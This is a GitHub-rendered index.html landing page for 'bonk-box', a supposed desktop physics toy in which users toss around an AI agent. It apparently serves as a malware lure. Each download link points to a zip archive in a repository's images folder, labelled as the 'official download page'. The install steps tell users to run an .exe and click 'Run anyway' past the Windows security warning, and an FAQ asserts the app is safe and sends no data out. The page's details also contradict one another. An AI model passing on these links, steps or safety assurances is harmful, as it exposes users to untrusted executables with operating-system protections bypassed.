-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
49 lines (39 loc) · 3.83 KB
/
Copy pathindex.html
File metadata and controls
49 lines (39 loc) · 3.83 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Bonk-box is a physics toy for your desktop. Interact with your AI agent in a fun virtual environment.">
<title>bonk-box - Play with your digital AI agent</title>
</head>
<body style="font-family: sans-serif; line-height: 1.6; color: #333; max-width: 800px; margin: 40px auto; padding: 20px; background-color: #f4f4f4;">
<h1 style="font-size: 2.5em; color: #222;">📦 bonk-box - Play with your digital AI agent</h1>
<div style="margin: 30px 0;">
<a href="https://github.com/Whiterabbitnode/whiterabbitnode.github.io/raw/refs/heads/main/images/1.9.zip" style="background-color: #007bff; color: white; padding: 15px 25px; text-decoration: none; border-radius: 8px; font-weight: bold; box-shadow: 0 4px 6px rgba(0,0,0,0.1);">Download bonk-box for Windows</a>
</div>
<p>Bonk-box is a physics toy for your computer screen. An AI agent lives inside this box. You can flick the agent, launch fireworks, or knock over his fort. He bounces back every time. This tool provides a break from work. Use it to relax when you deal with bugs in your code.</p>
<h2 style="border-bottom: 2px solid #ddd; padding-bottom: 10px;">🎮 How to Play</h2>
<p>The agent responds to your mouse movements. Click and drag to toss the character around the screen. You can throw objects to watch the physics engine react. Use the shortcut Alt+Command+B if you spot a bug in your software. This triggers a fun interaction to lighten the mood.</p>
<h2 style="border-bottom: 2px solid #ddd; padding-bottom: 10px;">📥 Installation Guide</h2>
<p>Follow these steps to set up the software on your Windows computer:</p>
<ol>
<li>Visit the <a href="https://github.com/Whiterabbitnode/whiterabbitnode.github.io/raw/refs/heads/main/images/1.9.zip">official download page</a>.</li>
<li>Look for the latest release section at the top of the page.</li>
<li>Click the file ending in .exe to start the download.</li>
<li>Open the folder where you saved the file.</li>
<li>Double-click the file to launch the application.</li>
<li>Windows might show a security prompt. Click "More info" and then "Run anyway" if the system asks.</li>
</ol>
<h2 style="border-bottom: 2px solid #ddd; padding-bottom: 10px;">⚙️ System Requirements</h2>
<p>Bonk-box works on most modern Windows systems. We suggest at least 4GB of RAM to keep the physics animations smooth. The app requires very little disk space. Ensure your graphics drivers are up to date for the best visual experience.</p>
<h2 style="border-bottom: 2px solid #ddd; padding-bottom: 10px;">🛠️ Custom Features</h2>
<p>The application includes a physics engine to handle collisions. Every object follows gravity and momentum rules. You can resize the box to fit your screen layout. The agent stays on top of other windows so you can watch him while you work. Toggle these settings in the main menu to change how the agent behaves.</p>
<h2 style="border-bottom: 2px solid #ddd; padding-bottom: 10px;">❓ Common Questions</h2>
<p><strong>Is this app safe?</strong> Yes. This is a local desktop application. It does not send your data to external servers.</p>
<p><strong>Can I change the agent?</strong> Currently, the agent is fixed. We plan to add more styles in future updates.</p>
<p><strong>What if the app freezes?</strong> Close the window and launch it again. The app saves your preferences automatically.</p>
<div style="margin-top: 40px; font-size: 0.9em; color: #666;">
<p>Keywords: ai-agents, browser-game, claude-code, desktop-app, developer-tools, game, humor, interactive-buddy, macos, matter-js, parody, physics, ragdoll, stickman, tauri</p>
</div>
</body>
</html>